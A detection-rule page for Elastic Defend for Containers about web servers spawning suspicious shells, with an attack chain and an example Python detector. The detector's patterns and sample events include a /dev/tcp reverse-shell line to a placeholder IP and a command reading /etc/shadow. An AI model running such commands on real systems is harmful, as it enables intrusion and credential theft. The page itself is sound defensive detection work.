high threat

Suspicious Web Server Child Process Execution via Elastic Defend for Containers

This rule detects exploitation of a web server by identifying suspicious processes executed by common web server user accounts within a containerized environment, which can indicate that a web shell has been uploaded to maintain system access. It covers the persistence, execution, and command and control tactics.

This detection rule, sourced from Elastic’s detection rules repository and designed for use with Elastic Defend for Containers, identifies potential web server exploitation attempts. It focuses on suspicious processes spawned by web server user accounts within containers, which can indicate attackers uploading web shells or exploiting remote command execution vulnerabilities to maintain access. Specifically, it looks for parent processes such as nginx, apache2, or php-fpm executing shell commands with suspicious arguments. The rule was created on 2026/02/06 and updated on 2026/06/01, when the Defend for Containers integration was reintroduced, and requires a minimum stack version of 9.3.0. Defenders should monitor such activity because it can lead to persistence, lateral movement, and further compromise within the containerized environment.

Attack Chain

  1. Initial Access: Attacker gains initial access to the web server, potentially through a vulnerability such as remote code execution (RCE) or by exploiting weak credentials.
  2. Web Shell Upload: The attacker uploads a web shell (e.g., PHP shell) to a publicly accessible directory on the web server.
  3. Command Execution: The attacker uses the web shell to execute commands on the server, often using a web-service account.
  4. Suspicious Process Spawn: The web server process spawns a shell process (e.g., bash, sh) with suspicious arguments, such as those used for reverse shells, file manipulation, or credential access.
  5. Persistence: The attacker establishes persistence by creating cron jobs or modifying system files.
  6. Lateral Movement: The attacker uses the compromised server as a pivot point to move laterally within the network, potentially targeting other containers or hosts.
  7. Command and Control: The attacker establishes a command and control (C2) channel with an external server to remotely control the compromised system.
  8. Data Exfiltration/System Damage: The attacker exfiltrates sensitive data or causes damage to the system, depending on their objectives.

Impact

Successful exploitation of web servers can lead to a range of negative consequences, including data breaches, system compromise, and financial losses. Attackers can use compromised web servers to steal sensitive data, launch attacks on other systems, or disrupt business operations. The potential impact is significant, particularly for organizations that rely on web applications to conduct business. The severity is rated high due to the potential for significant damage and the relative ease with which such attacks can be carried out.

Recommendation

  • Deploy the “Web Server Exploitation Detected via Defend for Containers” EQL rule to your Elastic Stack instance to detect suspicious process execution by web servers.
  • Enable Elastic Defend for Containers with a minimum stack version of 9.3.0 to collect the necessary data for the rule to function.
  • Prioritize investigation of alerts generated by the rule with a risk score of 73, particularly those involving reverse shells, file access, or credential access, as indicated in the rule’s query.
  • Review and tune the rule’s query to reduce false positives based on your specific environment and application configurations, as described in the “False positive analysis” section of the rule’s note.
  • Implement network segmentation and egress filtering to limit the potential impact of compromised containers, as suggested in the “Response and remediation” section of the rule’s note.

Detection coverage (2 rules)

Detect Web Server Suspicious Child Processes - Shell Spawn

high

Detects web server processes spawning shell processes with suspicious arguments indicative of command execution.

Format: sigma | Tactics: execution | Techniques: T1059.004 | Sources: process_creation, linux

Detect Web Server Suspicious Child Processes - Reverse Shell

high

Detects web server processes spawning shell processes with reverse shell arguments.

Format: sigma | Tactics: command_and_control, execution | Techniques: T1059.004, T1071.001 | Sources: process_creation, linux
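The detection logic described above (a web server parent such as nginx, apache2 or php-fpm, running as a web-service account inside a container, spawning a shell whose arguments point to reverse shells, file manipulation or credential access) and the two coverage entries it maps to can be illustrated with a small standalone detector. The following Python is an added example, not the Elastic rule, its EQL query, or any Elastic code; the web-server, user and shell lists, the indicator patterns, the ECS-style field names and the sample events are all constructed for this illustration and are assumptions rather than the rule's actual contents.

```python
import re

# Assumed lists for this example (not the Elastic rule's query).
WEB_SERVER_PARENTS = {"nginx", "apache2", "httpd", "php-fpm"}
WEB_SERVER_USERS = {"www-data", "apache", "nginx", "http"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Constructed indicator patterns, grouped by the categories the page names.
INDICATORS = {
    "reverse_shell": re.compile(r"/dev/tcp/|\b(nc|ncat)\b[^;|&]*\s-e\s|\bsocat\b[^;|&]*exec"),
    "credential_access": re.compile(r"/etc/shadow|/\.ssh/id_|/\.aws/credentials|\.kube/config"),
    "file_manipulation": re.compile(
        r"\b(curl|wget)\b[^;|&]*\s-[oO]\s|\bchmod\s+[0-7]*[+]?x\b|\bbase64\s+(-d|--decode)\b"
    ),
}


def classify_args(args):
    """Return the set of indicator categories matched by a child's argv."""
    cmdline = " ".join(args)
    return {name for name, pat in INDICATORS.items() if pat.search(cmdline)}


def evaluate(event):
    """Return a finding dict for a suspicious web-server child process, else None.

    Conditions mirror the page's description: a process start inside a container,
    a web-server parent, a web-service user, a shell child, and arguments that
    match at least one indicator category.
    """
    if event.get("event.action") != "exec" or not event.get("container.id"):
        return None
    parent = event.get("process.parent.name", "")
    user = event.get("user.name", "")
    child = event.get("process.name", "")
    args = event.get("process.args", [])
    if parent not in WEB_SERVER_PARENTS or user not in WEB_SERVER_USERS or child not in SHELLS:
        return None
    categories = classify_args(args)
    if not categories:
        return None
    # A reverse-shell match corresponds to the second coverage entry
    # (command_and_control + execution); anything else to the first (execution).
    tactics = ["command_and_control", "execution"] if "reverse_shell" in categories else ["execution"]
    return {
        "container": event["container.id"],
        "parent": parent,
        "user": user,
        "categories": sorted(categories),
        "tactics": tactics,
        "cmdline": " ".join(args),
    }


def scan(events):
    """Evaluate every event and return the list of findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed sample events using ECS-style field names (an assumption).
SAMPLE_EVENTS = [
    {"event.action": "exec", "container.id": "web-1", "process.parent.name": "php-fpm",
     "user.name": "www-data", "process.name": "sh",
     "process.args": ["sh", "-c", "id; cat < /dev/tcp/203.0.113.10/4444"]},
    {"event.action": "exec", "container.id": "web-1", "process.parent.name": "nginx",
     "user.name": "www-data", "process.name": "bash",
     "process.args": ["bash", "-c", "cat /etc/shadow"]},
    # Benign scheduled task run by the app: no indicator, no finding.
    {"event.action": "exec", "container.id": "web-2", "process.parent.name": "apache2",
     "user.name": "www-data", "process.name": "sh",
     "process.args": ["sh", "-c", "/usr/bin/php /var/www/app/artisan schedule:run"]},
    # Same command on the host (no container id): outside this rule's scope.
    {"event.action": "exec", "container.id": "", "process.parent.name": "nginx",
     "user.name": "www-data", "process.name": "sh",
     "process.args": ["sh", "-c", "cat /etc/shadow"]},
    # Parent is an interactive shell, not a web server: not this rule's concern.
    {"event.action": "exec", "container.id": "web-3", "process.parent.name": "bash",
     "user.name": "root", "process.name": "sh",
     "process.args": ["sh", "-c", "chmod +x /tmp/x"]},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Running the block prints two findings: the php-fpm child is tagged reverse_shell with both tactics, and the nginx child is tagged credential_access with execution only; the benign task, the host-side event and the non-web-server parent produce nothing, which is the kind of scoping the page's "False positive analysis" tuning is about.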
